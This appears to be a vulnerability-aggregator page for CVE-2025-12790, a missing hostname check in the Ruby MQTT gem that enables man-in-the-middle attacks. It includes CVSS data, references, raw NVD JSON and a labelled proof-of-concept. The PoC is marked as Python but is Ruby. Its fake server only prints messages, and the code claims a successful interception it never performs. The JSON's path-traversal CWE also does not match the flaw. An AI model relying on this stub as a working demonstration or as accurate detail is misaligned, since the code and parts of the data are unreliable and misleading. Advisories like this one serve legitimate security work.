CVE-2025-12790

Description

A flaw was found in Rubygem MQTT. By default, the package used to not have hostname validation, resulting in possible Man-in-the-Middle (MITM) attack.

CVSS Details

CVSS Score

7.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Rubygem MQTT < 0.7.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-12790 PoC - MITM Attack on Rubygem MQTT
# This PoC demonstrates the hostname validation bypass vulnerability

require 'mqtt'
require 'openssl'

# Create a fake MQTT server with self-signed certificate
class FakeMQTTServer
  def initialize(cert_path, key_path)
    @cert = OpenSSL::X509::Certificate.new(File.read(cert_path))
    @key = OpenSSL::PKey::RSA.new(File.read(key_path))
  end
  
  def start_fake_server(port = 8883)
    # Simulate malicious server accepting connections
    puts "[*] Fake MQTT server running on port #{port}"
    puts "[*] Waiting for victim connection..."
    # In real attack, this would intercept and manipulate traffic
  end
end

# Vulnerable client connection (without hostname verification)
def vulnerable_mqtt_connect(broker_host)
  # Default behavior - hostname validation is disabled
  MQTT::Client.connect(
    host: broker_host,
    port: 8883,
    ssl: true,
    # Missing: verify_mode: OpenSSL::SSL::VERIFY_PEER
    # Missing: cert_chain_file for proper validation
  )
end

# Example of vulnerable usage
begin
  client = vulnerable_mqtt_connect('attacker-controlled-server.example.com')
  # Connection succeeds even with fake certificate
  puts '[!] Connection established - hostname validation bypassed!'
  puts '[!] All traffic is now visible to MITM attacker'
  
  # Attacker's interception capabilities:
  # 1. Read all published messages
  # 2. Modify message content
  # 3. Inject fake commands
  # 4. Disconnect legitimate clients
rescue => e
  puts "[!] Error: #{e.message}"
end

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12790
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12790
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12790/
[4] VulDB https://vuldb.com/cve/CVE-2025-12790
[5] https://access.redhat.com/security/cve/CVE-2025-12790
[6] https://bugzilla.redhat.com/show_bug.cgi?id=2413004
[7] https://github.com/njh/ruby-mqtt/blob/main/NEWS.md#ruby-mqtt-version-070-2025-10-29

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12790", "sourceIdentifier": "[email protected]", "published": "2025-11-06T21:15:40.000", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Rubygem MQTT. By default, the package used to not have hostname validation, resulting in possible Man-in-the-Middle (MITM) attack."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-29"}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2025-12790", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2413004", "source": "[email protected]"}, {"url": "https://github.com/njh/ruby-mqtt/blob/main/NEWS.md#ruby-mqtt-version-070-2025-10-29", "source": "[email protected]"}]}}